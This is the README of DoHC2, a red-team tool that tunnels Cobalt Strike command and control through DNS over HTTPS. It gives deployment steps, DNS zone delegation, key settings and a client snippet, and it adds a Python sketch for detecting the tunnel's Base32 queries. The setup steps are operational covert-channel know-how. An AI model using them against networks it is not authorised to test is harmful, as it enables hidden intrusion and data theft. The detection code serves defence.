DoHC2
DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike (https://www.cobaltstrike.com).
Presentation
This project was released on October 23rd 2018 at Mitre ATT&CKcon.
Slides: Playing Devil’s Advocate to Security Initiatives with ATT&CK
Blog Article: DOH! DNS Over HTTPS Poses Possible Risks to Enterprises
Diagram
Usage
- Install and launch the Cobalt Strike teamserver.
- Launch a beacon_http/beacon_https listener. Gotcha: this listener can be firewalled off from the Internet, but it must exist for External C2 to work.
- Load the script 'external_c2.cna' to start ExternalC2 on port 2222 (firewall this port off from the Internet).
- Install the dependencies for the python3 server.
- Open port 53/udp to the Internet (or only to the DoH provider's IP ranges).
- Create an A record on your domain pointing to the teamserver/DNS server IP, e.g. [A] entry.example.org -> 000.000.000.000
- Create an NS record pointing to that A record for the send channel (INPUTDOMAIN), e.g. [NS] send.example.org -> entry.example.org.
- Create an NS record pointing to that A record for the receive channel (OUTPUTDOMAIN), e.g. [NS] receive.example.org -> entry.example.org.
- Change INPUTDOMAIN and OUTPUTDOMAIN in DoHC2.py. Change the encryption key/IV; it is used only to encrypt the path from the teamserver to the client (it encrypts the stager). Adjust max_records (default 1) for your DoH provider: some providers reorder the records they return, which is not currently handled, and a maximum of 5 works well with the DNS server.
- Launch the python3 DNS server.
- Build the ExternalC2 library. Change the encryption key/IV in DoHChannel.cs to match the python3 server.
- Configure and launch DoHC2() as shown below, being sure to set INPUTDOMAIN, OUTPUTDOMAIN and a DoH provider in the format 'https://resolver.example.org/dns-query'.
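The steps above describe the observable side of the channel from a defender's point of view: traffic is tunnelled as queries for long Base32-encoded subdomains under two NS-delegated zones (the send and receive channels). The client-to-provider leg travels inside HTTPS, but wherever the queries are visible in the clear (an internal resolver that clients fall back to when DoH is blocked, passive DNS, or the authoritative side where the provider's resolvers fetch from the delegated NS) they can be scored. The following detection sketch is an added example, not code from DoHC2 or its DNS server. The log format (timestamp, client, qtype, qname), the sample lines and the thresholds are constructed assumptions; the zone is taken as the last three labels for simplicity.

```python
import math
import re
from collections import defaultdict

# Constructed resolver-style log lines for this example only; they are not
# output of DoHC2 or the project's DNS server. Format: ts client qtype qname
SAMPLE_LOG = """\
2018-10-23T10:00:01Z 10.0.0.5 A www.example.com
2018-10-23T10:00:03Z 10.0.0.7 A mail.example.com
2018-10-23T10:00:04Z 10.0.0.7 A cdn.static.example.com
2018-10-23T10:00:05Z 10.0.0.9 A host01.static.example.com
2018-10-23T10:00:10Z 10.0.0.5 A api.corp.example.net
2018-10-23T10:00:11Z 10.0.0.5 A git.corp.example.net
2018-10-23T10:00:12Z 10.0.0.7 A wiki.corp.example.net
2018-10-23T10:00:13Z 10.0.0.7 A mail.corp.example.net
2018-10-23T10:00:14Z 10.0.0.9 A vpn.corp.example.net
2018-10-23T10:01:01Z 10.0.0.42 TXT ge2tsnbwgaztqobqfy3dknjrgeydcmjq.send.example.org
2018-10-23T10:01:02Z 10.0.0.42 TXT nbsww4dsnfxgg4tdmvugy2tmmvrw2zlxmm.send.example.org
2018-10-23T10:01:03Z 10.0.0.42 TXT obuwky3sn5wxi5lcmnrw4ylwmvzhg5lbmq.send.example.org
2018-10-23T10:01:04Z 10.0.0.42 TXT mfrgg43jmzqw4ylhnfxgs5dffv3woidvnz.send.example.org
2018-10-23T10:01:05Z 10.0.0.42 TXT n5xgs4tljrqwk5dfnbzhe2lmo5ug4c3qmf.send.example.org
2018-10-23T10:01:06Z 10.0.0.42 TXT krugkidrovsxe6lfmn2hk3lbnzswy3dt.send.example.org
2018-10-23T10:01:07Z 10.0.0.42 TXT mfzgkytvnrqw4fdfmfrw4idomvzhk5djoa.receive.example.org
2018-10-23T10:01:08Z 10.0.0.42 TXT n5zgkzldmvxhg2lpnqytemjum5sgkzlb.receive.example.org
2018-10-23T10:01:09Z 10.0.0.42 TXT on2gc2dfoj2w2ylemj4dqmryge2tkojy.receive.example.org
2018-10-23T10:01:10Z 10.0.0.42 TXT jbzgk4tfovqwyzlc.mbsxg5lrmu4tembzgy.receive.example.org
2018-10-23T10:01:11Z 10.0.0.42 TXT o5sw4zlsmj3xgzlpnnzwkyldmn2wk.receive.example.org
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
# RFC 4648 Base32 alphabet (A-Z, 2-7); DNS labels are case-insensitive.
BASE32_LABEL_RE = re.compile(r"^[a-z2-7]+$", re.IGNORECASE)


def parse_line(line):
    """Parse one constructed log line into a dict, or None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, qtype, qname = m.groups()
    return {"ts": ts, "client": client, "qtype": qtype,
            "qname": qname.rstrip(".").lower()}


def split_name(qname, zone_depth=3):
    """Split a query name into (zone, payload labels) using a fixed zone depth.
    Assumption for the example; production code would use a public-suffix list."""
    labels = qname.split(".")
    return ".".join(labels[-zone_depth:]), labels[:-zone_depth]


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for empty or single-symbol input)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_base32(payload):
    """True when every payload label uses only the Base32 alphabet."""
    return bool(payload) and all(BASE32_LABEL_RE.match(l) for l in payload)


def analyze(log_text, zone_depth=3):
    """Aggregate per-zone statistics over the log text."""
    acc = defaultdict(lambda: {"queries": 0, "unique": set(),
                               "payload_len": 0, "base32": 0, "entropy": 0.0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        zone, payload = split_name(rec["qname"], zone_depth)
        joined = "".join(payload)
        s = acc[zone]
        s["queries"] += 1
        s["unique"].add(rec["qname"])
        s["payload_len"] += len(joined)
        s["base32"] += 1 if looks_base32(payload) else 0
        s["entropy"] += shannon_entropy(joined)
    return {zone: {"queries": s["queries"],
                   "unique_names": len(s["unique"]),
                   "avg_payload_len": s["payload_len"] / s["queries"],
                   "base32_fraction": s["base32"] / s["queries"],
                   "avg_entropy": s["entropy"] / s["queries"]}
            for zone, s in acc.items()}


def flagged_zones(log_text, min_queries=5, min_avg_len=20,
                  min_base32_fraction=0.8, min_entropy=3.0):
    """Zones whose query volume, label length, alphabet and entropy all look
    like an encoded tunnel. Thresholds are assumptions chosen for the sample."""
    flagged = []
    for zone, st in analyze(log_text).items():
        if (st["queries"] >= min_queries
                and st["avg_payload_len"] >= min_avg_len
                and st["base32_fraction"] >= min_base32_fraction
                and st["avg_entropy"] >= min_entropy):
            flagged.append(zone)
    return sorted(flagged)


if __name__ == "__main__":
    for zone, st in sorted(analyze(SAMPLE_LOG).items()):
        print(f"{zone:24} q={st['queries']:2} len={st['avg_payload_len']:5.1f} "
              f"b32={st['base32_fraction']:.2f} H={st['avg_entropy']:.2f}")
    print("flagged:", flagged_zones(SAMPLE_LOG))
```

The four conditions are deliberately combined: corp.example.net has five queries whose short labels are all within the Base32 alphabet but fail the length and entropy checks, while the two delegated channel zones pass all of them. The max_records setting described above (several records per response) also means one query can carry several records, so per-zone response sizes are a further signal worth logging where the resolver exposes them.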
Server
Python DNS server based on ACME DNS Server.
- This interfaces raw DNS to the Cobalt Strike teamserver on 127.0.0.1:2222 by default.
- Change INPUTDOMAIN and OUTPUTDOMAIN to hosts whose NS records delegate to the server's external IP:
pip3 install -r requirements.txt
sudo python3 ./DoHC2.py
Library
@ryhanson's ExternalC2 with the following additions:
- Channels > DoHChannel.cs - DoH implementation
- Channels > Base32.cs (from https://gist.github.com/BravoTango86/2a085185c3b9bd8383a1f956600e515f)
- DoHC2.cs - DoH channel set-up / wrapper
- Newtonsoft.JSON (https://www.newtonsoft.com/json) is added to the project
Example Client
- As with the rest of ExternalC2, DoHC2 is COMVisible for JScript/DotNetToJS, but this is a simple example of initiating it.
- The example client DoHC2Runner is a simple C# program that demonstrates loading the library and setting it up as follows:
DoHC2 doh = new DoHC2();
doh.Configure("<INPUTDOMAIN>", "<OUTPUTDOMAIN>", "<DoH URI, e.g. https://dns.google.com/resolve or https://dns.example.org/dns-query>");
doh.Go();
Authors
- David Middlehurst - Twitter: @dtmsecurity
License
DoHC2
Some elements created by David Middlehurst, SpiderLabs as described above (please refer to the respective licenses where other open-source projects are utilised).
Copyright (C) 2018 Trustwave Holdings, Inc.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.